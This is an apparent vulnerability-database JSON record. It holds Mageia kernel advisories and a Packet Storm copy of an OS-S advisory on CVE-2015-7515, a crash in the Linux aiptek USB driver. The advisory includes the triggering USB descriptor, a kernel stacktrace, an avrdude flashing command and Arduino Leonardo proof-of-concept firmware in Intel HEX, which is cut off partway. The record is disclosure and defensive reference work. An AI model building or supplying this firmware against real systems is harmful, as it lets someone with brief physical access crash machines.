"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5257"], "modified": "2015-11-07T20:11:27", "id": "MGASA-2015-0435", "href": "https://advisories.mageia.org/MGASA-2015-0435.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-28T02:27:12", "description": "This update of kernel-linus provides the upstream 4.1.12 longterm kernel and fixes at least the following security issue: Moein Ghasemzadeh discovered that the USB WhiteHEAT serial driver contained hardcoded attributes about the USB devices. An attacker could construct a fake WhiteHEAT USB device that, when inserted, causes a denial of service (system crash) (CVE-2015-5257). It also fixes various upstream bugs, for more info see the referenced changelogs: \n", "cvss3": {}, "published": "2015-11-10T18:41:41", "type": "mageia", "title": "Updated kernel-linus packages fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5257"], "modified": "2015-11-10T18:41:40", "id": "MGASA-2015-0439", "href": "https://advisories.mageia.org/MGASA-2015-0439.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:45", "description": "", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "packetstorm", "title": "Linux aiptek Null Pointer Dereference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7515"], "modified": "2016-03-09T00:00:00", "id": "PACKETSTORM:136137", "href": "https://packetstormsecurity.com/files/136137/Linux-aiptek-Null-Pointer-Dereference.html", "sourceData": "`OS-S Security Advisory 2016-05 \nLinux aiptek Nullpointer Dereference \n \nDate: March 4th, 2016 \nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg \nCVE: CVE-2015-7515 \nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) \nTitle: Local RedHat Enterprise Linux DoS \u2013 RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (aiptek driver) \nSeverity: Critical. The Kernel panics. A reboot is required. \nEase of Exploitation: Trivial \nVulnerability type: Wrong input validation \nProducts: RHEL 7.1 including all updates \nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) \nVendor: Red Hat \nVendor contacted: November, 12th 2015 \nPDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf \n \nAbstract: \nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB \ndevice using the aiptek driver. \n \nDetailed product description: \nWe confirmed the bug on the following system: \nRHEL 7.1 \nKernel 3.10.0-229.20.1.el7.x86_64 \nFurther products or kernel versions have not been tested. \nHow reproducible: Always \nActual results: Kernel crashes. \n \nDescription: \nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor: \n \n[*] Device-Descriptor \nbLength: 0x12 \nbDescriptorType: 0x1 \nbcdUSB: 0x200 \nbDeviceClass: 0x3 \nbDeviceSubClass: 0x0 \nbDeviceProtocol: 0x0 \nbMaxPacketSize: 0x40 \nidVendor: 0x458 \nidProduct: 0x5003 \nbcdDevice: 0x100 \niManufacturer: 0x1 \niProduct: 0x2 \niSerialNumbers: 0x3 \nbNumConfigurations: 0x1 \n[*] Configuration-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x2 \nwTotalLength: 0x27 \nbNumInterfaces: 0x1 \nbConfigurationValue: 0x1 \niConfiguration: 0x0 \nbmAttributes: 0x0 \nbMaxPower: 0x31 \n[*] Interface-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x4 \nbInterfaceNumber: 0x0 \nbAlternateSetting: 0x0 \nbNumEndpoints: 0x0 \nbInterfaceClass: 0x0 \nbInterfaceSubClass: 0x0 \nbInterfaceProtocol: 0x0 \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x81 \nbmAttribut: 0x3 \nwMaxPacketSize: 0x404 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x1 \nbmAttribut: 0x2 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x82 \nbmAttribut: 0x1 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n \n \nThe aiptek driver assumes that there will be at least one endpoint-descriptor. \nIf the interface-descriptor contains a zero-value for bNumEndpoints or no \nendpoint-descriptor is provided, the driver tries to dereference a null- \npointer and the kernel crashes: \n \n**** \n$ nm aiptek.ko.debug | grep aiptek_probe \n0000000000001ea0 t aiptek_probe \n$ addr2line -e aiptek.ko.debug 2303 \n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/drivers/input/tablet/aiptek.c:1830 \n**** \n \n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c) \n \n \n1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */ \n1823 \n1824 /* Go set up our URB, which is called when the tablet receives \n1825 * input. \n1826 */ \n1827 usb_fill_int_urb(aiptek->urb, \n1828 aiptek->usbdev, \n1829 usb_rcvintpipe(aiptek->usbdev, \n1830 endpoint->bEndpointAddress), /* Nullpointer- \nDereference */ \n1831 aiptek->data, 8, aiptek_irq, aiptek, \n1832 endpoint->bInterval); \n**** \n \n \n \n \nProof of Concept: \nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device. \n \n \navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex \n \n \nThe firmware has been attached to this bug report. \nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3! \n \nSeverity and Ease of Exploitation: \nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required. \n \nVendor Communication: \nWe contacted Red Hat on the November, 12th 2015. \nA patch was provided on the November, 25th 2015. \n \nReferences: \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1285326 \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283350 \n \n \nKernel Stacktrace: \n \n[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd \n[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint \ndescriptors, different from the interface descriptor's value: 0 \n[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003 \n[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3 \n[ 622.399416] usb 1-1: Product: \u0109 \n[ 622.404640] usb 1-1: Manufacturer: \u0109 \n[ 622.410079] usb 1-1: SerialNumber: % \n[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000002 \n[ 622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek] \n[ 622.445019] PGD 0 \n[ 622.445019] Oops: 0000 [#1] SMP \n[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT \nipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc \nebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 \nnf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter \nip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat \nnf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter \nip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper \ndrm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c \nsd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix \nlibata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod \n[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1 \n[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 \n[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000 \n[ 622.445019] RIP: 0010:[<ffffffffa0395303>] [<ffffffffa0395303>] \naiptek_probe+0x463/0x658 [aiptek] \n[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286 \n[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800 \n[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000 \n[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000 \n[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800 \n[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834 \n[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000 \n[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b \n[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: \n00000000000006f0 \n[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000 \n[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 \n[ 622.445019] Stack: \n[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246 \n0000019000000032 \n[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092 \nffff88000bcd0890 \n[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0 \n[ 622.445019] Call Trace: \n[ 622.445019] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0 \n[ 622.445019] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390 \n[ 622.445019] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0 \n[ 622.445019] [<ffffffff813d3420>] ? __device_attach+0x40/0x40 \n[ 622.445019] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0 \n[ 622.445019] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20 \n[ 622.445019] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0 \n[ 622.445019] [<ffffffff813d3b34>] driver_register+0x64/0xf0 \n[ 622.445019] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160 \n[ 622.445019] [<ffffffffa039a000>] ? 0xffffffffa0399fff \n[ 622.445019] [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek] \n[ 622.445019] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230 \n[ 622.445019] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40 \n[ 622.445019] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0 \n[ 622.445019] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150 \n[ 622.445019] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0 \n[ 622.445019] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b \n[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 \ne8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> \nb6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00 \n[ 622.445019] RIP [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek] \n[ 622.445019] RSP <ffff88000f4cfb80> \n[ 622.445019] CR2: 0000000000000002 \n[ 622.860772] ---[ end trace b239663354a1c556 ]--- \n[ 622.864813] Kernel panic - not syncing: Fatal exception \n[ 622.865768] drm_kms_helper: panic occurred, switching back to text console \n \n \nArduino Leonardo Firmware: \n \n:100000000C94A8000C94C5000C94C5000C94C50079 \n:100010000C94C5000C94C5000C94C5000C94C5004C \n:100020000C94C5000C94C5000C94C2050C942D04CE \n:100030000C94C5000C94C5000C94C5000C94C5002C \n:100040000C94C5000C94C5000C94C5000C94C5001C \n:100050000C94C5000C94C5000C94C5000C940C02C3 \n:100060000C94C5000C94C5000C94C5000C94C500FC \n:100070000C94C5000C94C5000C94C5000C94C500EC \n:100080000C94C5000C94C5000C94C5000C94C500DC \n:100090000C94C5000C94C5000C94C5000C94C500CC \n:1000A0000C94C5000C94C5000C94C50009030C0306 \n:1000B000FF0203032D032D032D0310031403180364 \n:1000C0001E0322032D0328030000000200080E0077 \n:1000D00000030401000B000000000000000000000D \n:1000E00000000000000004080201104080401020C1 \n:1000F00040804080080204018040201002011080EE \n:100100001020404004040404040304050202020217 \n:1001100004030202020206060606060604040202A0 \n:100120000204000000002300260029002C002F00FC \n:1001300000000000250028002B002E0031000000E8 \n:100140000000240027002A002D00300000C180811B \n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 \n:10016000B1E0E0EDF3E102C005900D92A436B107D5 \n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C \n:10018000E1F70E94C8000C9402070C940000089547 \n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 \n:1001A000DEBF0FBECDBF0E949F020E94C70060E06D \n:1001B00083E00E942E0361E087E00E942E0361E04D \n:1001C00088E00E942E030E9457067E012AE9E20E73 \n:1001D000F11C84E093E0D70111969C938E9389E003 \n:1001E00094E013969C938E93129782E2E2E1F1E001 \n:1001F0009E012F5F3F4F6901D90101900D928A95B1 \n:10020000E1F788E1E4E3F1E0DE01939601900D92DD \n:100210008A95E1F782E1ECE4F1E0DE01DB96019002 \n:100220000D928A95E1F789E0EEE5F1E0DE01A05953 \n:10023000BF4F01900D928A95E1F72A593F4F99E0FF \n:10024000992ED901E92D1D92EA95E9F78E010957FA \n:100250001F4F87E0E7E6F1E0D80101900D928A9503 \n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 \n:1002700001900D928A95E1F7AE0147585F4F87E0F4 \n:10028000E5E7F1E0DA0101900D928A95E1F75E0170 \n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D \n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 \n:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 \n:1002C0009082E4E0D9011196EC93F901DC01292D2B \n:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB \n:1002E0001B96FC93EE931A971D96BC92AE921C97A8 \n:1002F0001183008373836283558344830C521109F5 \n:100300002CE0F80111922A95E9F721E0D80119961D \n:100310002C931997FE01E059FF4F01900D929A948A \n:10032000E1F7F8019387828761E088E00E94670324 \n:100330008BE492E00E94630688E892E00E946306E4 \n:1003400087EC92E00E94630686E093E00E946306D9 \n:1003500082E493E00E9463068FE793E00E946306C5 \n:1003600084EA93E00E9463068BEE93E00E946306AA \n:1003700083E00E949D03892B09F047C05E01F3E2F0 \n:10038000AF0EB11C8824839482E1982E84E194E01E \n:100390000E946306BF92AF92DF92CF92FF92EF92DC \n:1003A0001F928F921F930F932DB73EB722513109A1 \n:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 \n:1003C000FE01FB96892D01900D928A95E1F78DE64D \n:1003D00095E00E94010668E873E180E090E00E94E9 \n:1003E00079028DE695E00E944C0660E087E00E946D \n:1003F000670368E873E180E090E00E9479020FB63D \n:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 \n:1004100090E00E947902ACCF1F920F920FB60F921C \n:1004200011242F933F938F939F93AF93BF9380910A \n:10043000650590916605A0916705B09168053091BA \n:10044000640523E0230F2D3720F40196A11DB11D73 \n:1004500005C026E8230F0296A11DB11D2093640557 \n:100460008093650590936605A0936705B093680532 \n:100470008091690590916A05A0916B05B0916C051A \n:100480000196A11DB11D8093690590936A05A09303 \n:100490006B05B0936C05BF91AF919F918F913F9188 \n:1004A0002F910F900FBE0F901F9018953FB7F894A3 \n:1004B0008091690590916A05A0916B05B0916C05DA \n:1004C00026B5A89B05C02F3F19F00196A11DB11DAF \n:1004D0003FBF6627782F892F9A2F620F711D811DCC \n:1004E000911D42E0660F771F881F991F4A95D1F72B \n:1004F0000895CF92DF92EF92FF92CF93DF936B013B \n:100500007C010E945602EB01C114D104E104F10404 \n:1005100079F00E9456026C1B7D0B683E7340A0F37D \n:1005200081E0C81AD108E108F108C851DC4FECCFCE \n:10053000DF91CF91FF90EF90DF90CF900895789466 \n:1005400084B5826084BD84B5816084BD85B58260D8 \n:1005500085BD85B5816085BDEEE6F0E08081816076 \n:100560008083E1E8F0E01082808182608083808176 \n:1005700081608083E0E8F0E0808181608083E1E950 \n:10058000F0E0808182608083808181608083E0E907 \n:10059000F0E0808181608083E1ECF0E08081846024 \n:1005A0008083808182608083808181608083E3ECAE \n:1005B000F0E0808181608083E0ECF0E08081826007 \n:1005C0008083E2ECF0E0808181608083EAE7F0E004 \n:1005D000808184608083808182608083808181606B \n:1005E0008083808180688083089590E0FC0131974A \n:1005F000EE30F10590F5EA5AFF4F0C94A90980916D \n:1006000080008F7703C0809180008F7D8093800071 \n:10061000089584B58F7702C084B58F7D84BD089519 \n:10062000809190008F7707C0809190008F7D03C0EC \n:1006300080919000877F8093900008958091C00002 \n:100640008F7703C08091C0008F7D8093C000089594 \n:100650008091C200877F8093C2000895CF93DF937B \n:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A \n:100670008491882349F190E0880F991FFC01E25C86 \n:10068000FE4FA591B491805D9E4FFC01C591D49120 \n:100690009FB7611108C0F8948C91209582238C93A8 \n:1006A000888182230AC0623051F4F8948C91322FF1 \n:1006B000309583238C938881822B888304C0F8949F \n:1006C0008C91822B8C939FBFDF91CF9108950F93D4 \n:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 \n:1006E000F901E853FF4F8491F901EA51FF4F14914A \n:1006F000F901EC5FFE4F04910023C9F0882321F03B \n:1007000069830E94F5026981E02FF0E0EE0FFF1F80 \n:10071000E05DFE4FA591B4919FB7F8948C91611163 \n:1007200003C01095812301C0812B8C939FBF0F9034 \n:10073000DF91CF911F910F910895CF93DF93282FD1 \n:1007400030E0F901E853FF4F8491F901EA51FF4F7E \n:10075000D491F901EC5FFE4FC491CC2391F081114B \n:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 \n:10077000A591B4912C912D2381E090E021F480E0AB \n:1007800002C080E090E0DF91CF910895615030F099 \n:100790002091F100FC0120830196F8CF289884E68F \n:1007A00080937D0508951092E900109271051092D2 \n:1007B000700590936F0580936E050895FF920F93D7 \n:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 \n:1007D0000E94A406F80120E030E08EEF2C173D07C0 \n:1007E00091F1F7FE02C0A49101C0A0816091700553 \n:1007F0007091710540916E0550916F0564177507F2 \n:10080000ACF49091E8009570E1F39091E80092FDCE \n:100810001CC0A093F100A0917005B09171051196D4 \n:10082000AF73BB27AB2B11F48093E800A091700548 \n:10083000B09171051196B0937105A09370052F5F6B \n:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 \n:10085000CF911F910F91FF9008951F920F920FB6A5 \n:100860000F9211246F927F928F929F92AF92BF92BC \n:10087000CF92DF92EF92FF920F931F932F933F93AC \n:100880004F935F936F937F938F939F93AF93BF9398 \n:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 \n:1008A000CDBF1092E9008091E80083FF46C168E067 \n:1008B000CE010A960E94C60382EF8093E8009A85D3 \n:1008C00097FF05C08091E80080FFFCCF03C08EEF4A \n:1008D0008093E800892F807609F023C18B858111F0 \n:1008E00005C01092F1001092F10020C1282F2D7F39 \n:1008F000213009F41BC1853049F48091E80080FF64 \n:10090000FCCF8C8580688093E30010C1863009F0AD \n:10091000E1C02D8508891989223009F0B3C0EC8423 \n:100920008E2D90E020917305309174058217930706 \n:100930000CF09FC00E94D3031F92EF928DE394E0CE \n:100940009F938F930E9481068CE0E89E7001112492 \n:10095000E0917505F0917605EE0DFF1D89E0DE0151 \n:10096000119601900D928A95E1F7C8010E94D30378 \n:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 \n:100980000F900F900F900F90C12CD12C612C712CD7 \n:1009900033E7A32E34E0B32E4AEA842E44E0942EAB \n:1009A000E0917505F0917605EE0DFF1D818590E0D3 \n:1009B000681679060CF0BAC07F926F92BF92AF9220 \n:1009C0000E948106E0917505F0917605EE0DFF1D00 \n:1009D000628573856C0D7D1D49E050E080E00E94CA \n:1009E000DE030F900F900F900F9000E010E0E09169 \n:1009F0007505F0917605EE0DFF1D0284F385E02D5F \n:100A0000EC0DFD1D818590E0081719075CF51F931B \n:100A10000F939F928F920E948106E0917505F0914D \n:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 \n:100A3000C801880F991FA485B585A80FB91F4D91CE \n:100A40005C910284F385E02DE80FF91F60817181CC \n:100A500080E00E94DE030F5F1F4F0F900F900F90FA \n:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 \n:100A700097CF8FED94E09F938F930E9481060F9004 \n:100A80000F9058C0C8012A8B0E94D3032A892130B5 \n:100A9000C1F0233009F04EC08C851F928F9389EFEF \n:100AA00094E09F938F930E94810642E050E062E8B9 \n:100AB00071E080E00E94DE030F900F900F900F9086 \n:100AC00035C04091000150E060E071E080E00E949C \n:100AD000DE032CC0873071F1883021F481E08093EF \n:100AE000F10024C0893011F5937021F5EDE4F1E0B7 \n:100AF00081E021E096E38093E9002093EB003491BC \n:100B00003093EC009093ED008F5F3196843099F72D \n:100B10008EE78093EA001092EA008C85809372053C \n:100B200005C0888999890E94D30304C08EEF809301 \n:100B3000E80003C081E28093EB0062960FB6F89460 \n:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F \n:100B5000AF919F918F917F916F915F914F913F9155 \n:100B60002F911F910F91FF90EF90DF90CF90BF904A \n:100B7000AF909F908F907F906F900F900FBE0F90CF \n:100B80001F9018951F920F920FB60F9211248F93FA \n:100B90009F938091E1001092E10083FF0FC01092BB \n:100BA000E90091E09093EB001092EC0092E39093B7 \n:100BB000ED001092720598E09093F00082FF1AC049 \n:100BC00080917E05882339F080917E058150809345 \n:100BD0007E05882369F080917D05882359F08091F6 \n:100BE0007D05815080937D05811104C0289A02C043 \n:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 \n:100C00001895CF93DF93CDB7DEB782E1FE0135961D \n:100C1000A0E0B1E001900D928A95E1F78F89988D5F \n:100C20009093760580937505898D9A8D90937405C0 \n:100C3000809373058B8D9C8D90937C0580937B05B1 \n:100C40008D8D9E8D90937A05809379058F8D98A1D7 \n:100C500090937805809377051092720581E08093D8 \n:100C6000D70080EA8093D80082E189BD09B400FEF4 \n:100C7000FDCF61E070E080E090E00E94790280E9C1 \n:100C80008093D8008CE08093E2001092E000559AA7 \n:100C9000209ADF91CF91089581E08093E00008953C \n:100CA0009091C80095FFFCCF8093CE0008951092DC \n:100CB000CD0087E68093CC0088E18093C9008EE068 \n:100CC0008093CA0008950F931F93CF93DF93EC0195 \n:100CD0008C01FE0101900020E9F73197EC1BFD0B20 \n:100CE000C8018C1B9D0B8E179F0730F4F801819172 \n:100CF0008F010E945006EDCFDF91CF911F910F9190 \n:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 \n:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 \n:100D20009F0160E071E0CE0101960E940507CE01AF \n:100D300001960E946306D3950FB6F894DEBF0FBEEE \n:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 \n:100D5000CF92DF92EF92FF920F931F93CF93DF9387 \n:100D600000D0CDB7DEB75B0122E535E03F932F938E \n:100D700089839A830E9481068981882E9A81992E7F \n:100D80000F900F9000E010E08EE5E82E85E0F82E41 \n:100D900091E1C92E94E0D92E0A151B05E4F4F40163 \n:100DA00081914F0190E09F938F93FF92EF920E9469 \n:100DB00081060F5F1F4FC8018F7099270F900F900A \n:100DC0000F900F90892B41F7DF92CF920E948106FE \n:100DD0000F900F90E1CF81E194E09F938F930E9459 \n:100DE00081060F900F900F900F90DF91CF911F9180 \n:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA \n:100E00008F900895F8940C94E609AEE0B0E0EBE022 \n:100E1000F7E00C94BD098C01CA0146E04C831A83AB \n:100E2000098377FF02C060E070E8615071097E833A \n:100E30006D83A901BC01CE0101960E9431074D814D \n:100E40005E8157FD0AC02F813885421753070CF485 \n:100E50009A01F801E20FF31F10822E96E4E00C9441 \n:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E \n:100E70006B018A01FC0117821682838181FFBDC14B \n:100E8000CE0101964C01F7019381F60193FD859106 \n:100E900093FF81916F01882309F4ABC1853239F446 \n:100EA00093FD859193FF81916F01853229F4B701FC \n:100EB00090E00E941909E7CF512C312C20E020321C \n:100EC000A0F48B3269F030F4803259F0833269F447 \n:100ED00020612CC08D3239F0803339F4216026C076 \n:100EE0002260246023C0286021C027FD27C030ED88 \n:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 \n:100F00001124532E13C08AE0389E300D1124332E45 \n:100F100020620CC08E3221F426FD6BC1206406C015 \n:100F20008C3611F4206802C0883641F4F60193FD36 \n:100F3000859193FF81916F018111C1CF982F9F7D82 \n:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 \n:100F5000833631F0833771F0833509F05BC022C0EE \n:100F6000F801808189830E5F1F4F44244394512CE4 \n:100F7000540115C03801F2E06F0E711CF801A08019 \n:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 \n:100F9000C5012C870E940E092C0183012C852F7717 \n:100FA000222E17C03801F2E06F0E711CF801A080EC \n:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 \n:100FC000C5012C870E9403092C012C852068222E44 \n:100FD000830123FC1BC0832D90E048165906B0F412 \n:100FE000B70180E290E00E9419093A94F4CFF5012C \n:100FF00027FC859127FE81915F01B70190E00E9457 \n:10100000190931103A94F1E04F1A51084114510472 \n:1010100071F7E5C0843611F0893639F5F80127FFFC \n:1010200007C060817181828193810C5F1F4F08C06E \n:1010300060817181882777FD8095982F0E5F1F4F03 \n:101040002F76B22E97FF09C0909580957095619587 \n:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF \n:101060000E944B09A82EA81844C0853729F42F7E6A \n:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 \n:10108000C1F018F4883579F0B4C0803719F088378A \n:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA \n:1010A0008460B82E09C024FF0AC09F2F9660B92E15 \n:1010B00006C028E030E005C020E130E002C020E1B9 \n:1010C00032E0F801B7FE07C06081718182819381AF \n:1010D0000C5F1F4F06C06081718180E090E00E5F61 \n:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 \n:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 \n:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 \n:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E \n:10112000F11D8081803311F4297E09C022FF06C0A1 \n:101130007394739404C0822F867809F0739423FD0E \n:1011400013C020FF06C05A2C731418F4530C571800 \n:10115000732C731468F4B70180E290E02C870E942E \n:10116000190973942C85F5CF731410F4371801C046 \n:10117000312C24FF12C0B70180E390E02C870E943D \n:1011800019092C8522FF17C021FF03C088E590E0D4 \n:1011900002C088E790E0B7010CC0822F867859F032 \n:1011A00021FD02C080E201C08BE227FD8DE2B70184 \n:1011B00090E00E941909A51438F4B70180E390E08B \n:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F \n:1011D0008081B70190E00E941909A110F5CF33205A \n:1011E00009F451CEB70180E290E00E9419093A94C7 \n:1011F000F6CFF7018681978102C08FEF9FEF2C9683 \n:10120000E2E10C94CB09FC010590615070400110A3 \n:10121000D8F7809590958E0F9F1F0895FC0161501F \n:10122000704001900110D8F7809590958E0F9F1F08 \n:1012300008950F931F93CF93DF93182F092FEB017E \n:101240008B8181FD03C08FEF9FEF20C082FF10C014 \n:101250004E815F812C813D81421753077CF4E881E8 \n:10126000F9819F012F5F3F4F39832883108306C088 \n:10127000E885F985812F0995892B29F72E813F81F2 \n:101280002F5F3F4F3F832E83812F902FDF91CF9190 \n:101290001F910F910895FA01AA27283051F12031AA \n:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA \n:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C \n:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A \n:1012D000711D811D911DA11D20D009F468943F91BD \n:1012E0002AE0269F11243019305D3193DEF6CF01BC \n:1012F0000895462F4770405D4193B3E00FD0C9F782 \n:10130000F6CF462F4F70405D4A3318F0495D31FDEE \n:101310004052419302D0A9F7EACFB4E0A695979541 \n:10132000879577956795BA95C9F700976105710517 \n:1013300008959B01AC010A2E069457954795379561 